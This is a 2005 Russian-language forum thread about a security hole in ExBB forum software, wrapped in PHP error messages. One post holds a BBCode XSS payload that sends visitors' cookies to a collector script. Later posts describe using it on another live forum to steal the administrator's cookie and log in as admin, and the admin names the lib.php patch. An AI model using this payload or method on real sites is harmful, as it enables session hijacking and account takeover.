Strict Standards: Resource ID#18 used as offset, casting to integer (18) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#23 used as offset, casting to integer (23) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#25 used as offset, casting to integer (25) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#26 used as offset, casting to integer (26) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401
ТвойWeb :: Проблемы безопасности
ТвойWeb ТвойWeb
Качественный Европейский хостинг
 Форум для чайников
 Чат на форуме      Помощь      Поиск      Пользователи


 Страниц (2): [1] 2 » 

> Описание: Топик создан с целью обнаружения проблемы, просьба меня не банить :)
Поиск в теме | Версия для печати
Aleksej
Отправлено: 20 Февраля, 2005 - 13:22:08
Post Id


Advanced Member


Покинул форум
Сообщений всего: 254
Дата рег-ции: Дек. 2004  

Карма 0




 Вот такая проблемкаНе понял

[url="http://hacsoft.h14.ru/phpBB2"style="background:url(javascript:document.location='http://localhost/h.php?v='+escape(document.cookie));"]Проблемы?[/url]\n\n(Добавление)
Вопрос снят, эта дыра в этом форуме закрыта: это радует. Подмигивание
 
 Top
TvoyWeb Администратор
Отправлено: 20 Февраля, 2005 - 17:02:20
Post Id



Главный здесь


Покинул форум
Сообщений всего: 7072
Дата рег-ции: Нояб. 2003  
Откуда: Tashkent Uz

Карма 52




 Aleksej
Оставлю тему. Если что найдешь пости сюда.
 
 Top
Aleksej
Отправлено: 21 Февраля, 2005 - 01:51:33
Post Id


Advanced Member


Покинул форум
Сообщений всего: 254
Дата рег-ции: Дек. 2004  

Карма 0




 Зайдите вот сюда: http://exbb.h11.ru/forums
Раздел "Тестовый раздел" тема "Авторедерект". Если ее админы не удалят или что-то не поменяют, то после открытия этой темы вас перебросит на форум хаксофта Улыбка\n\n(Добавление)
В IE это работает, а в Опере нет.
 
 Top
Aleksej
Отправлено: 25 Февраля, 2005 - 07:34:01
Post Id


Advanced Member


Покинул форум
Сообщений всего: 254
Дата рег-ции: Дек. 2004  

Карма 0




 Эта проблема оказалась очень даже серьезной. Админ того форума теперь забанен:
http://exbb.h11.ru/forums/search...p?action=members
 
 Top
TvoyWeb Администратор
Отправлено: 25 Февраля, 2005 - 15:37:21
Post Id



Главный здесь


Покинул форум
Сообщений всего: 7072
Дата рег-ции: Нояб. 2003  
Откуда: Tashkent Uz

Карма 52




 Aleksej
Ты бы хоть показал код, который был вставлен в пост.
 
 Top
Aleksej
Отправлено: 26 Февраля, 2005 - 01:50:02
Post Id


Advanced Member


Покинул форум
Сообщений всего: 254
Дата рег-ции: Дек. 2004  

Карма 0




 Я описал подробно метод взлома тут: http://hacsoft.h14.ru/phpBB2/viewtopic.php?t=63
Принцип: получаем cookie админа, а затем используем автовход на форум, подменив свои cookie на полученные и заходим под админом Подмигивание
 
 Top
Aleksej
Отправлено: 03 Апреля, 2005 - 10:06:04
Post Id


Advanced Member


Покинул форум
Сообщений всего: 254
Дата рег-ции: Дек. 2004  

Карма 0




 TvoyWeb
Укажи плиз ссылки на то, где ты качал патчи для этого форума. Надо закрыть указанную дыру, не знаю как.
Заранее благодарен!
 
 Top
TvoyWeb Администратор
Отправлено: 03 Апреля, 2005 - 10:31:52
Post Id



Главный здесь


Покинул форум
Сообщений всего: 7072
Дата рег-ции: Нояб. 2003  
Откуда: Tashkent Uz

Карма 52




 Aleksej
Что-то я не понял! Ты вроде сам писал об этой дыре и не знаешь как ее закрыть?
 
 Top
Aleksej
Отправлено: 04 Апреля, 2005 - 04:04:18
Post Id


Advanced Member


Покинул форум
Сообщений всего: 254
Дата рег-ции: Дек. 2004  

Карма 0




 Нет, дыру знаю, а как закрыть нет. Что тут непонятного? Дыры можно найти экспериментально методом перебора и анализа. А что бы закрыть надо копаться в скриптах форума или брать уже готовые патчи. Вот, что бы не копаться в скриптах и хочется узнать, где найти готовый патч Улыбка
 
 Top
TvoyWeb Администратор
Отправлено: 04 Апреля, 2005 - 04:47:58
Post Id



Главный здесь


Покинул форум
Сообщений всего: 7072
Дата рег-ции: Нояб. 2003  
Откуда: Tashkent Uz

Карма 52




 Aleksej
От таких дыр я выкладывал на ExBB заплатку. А в принципе можешь качнуть полный архив форума ExBB и взять из него файл lib.php.
если ты свой lib.php правил, то можешь взять только функцию ikoncode().
 
 Top
Поиск в теме | Версия для печати
Страниц (2): [1] 2 »
Сейчас эту тему просматривают: 3 (гостей: 3, зарегистрированных: 0, скрытых: 0)
« ExBB - лучший форум на файлах »


Все гости форума могут просматривать этот раздел.
Только администраторы и модераторы могут создавать новые темы в этом разделе.
Только администраторы и модераторы могут отвечать на сообщения в этом разделе.



Форум на AlfaSpace.NET


Powered by ExBB
ExBB FM 1.0 RC1 by TvoyWeb.ru
InvisionExBB Style converted by Markus®
[Script Execution time: 0.06]     [ Gzipped ]



Notice: ob_end_flush(): failed to send buffer of ob_gzhandler (1) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/page_tail.php on line 33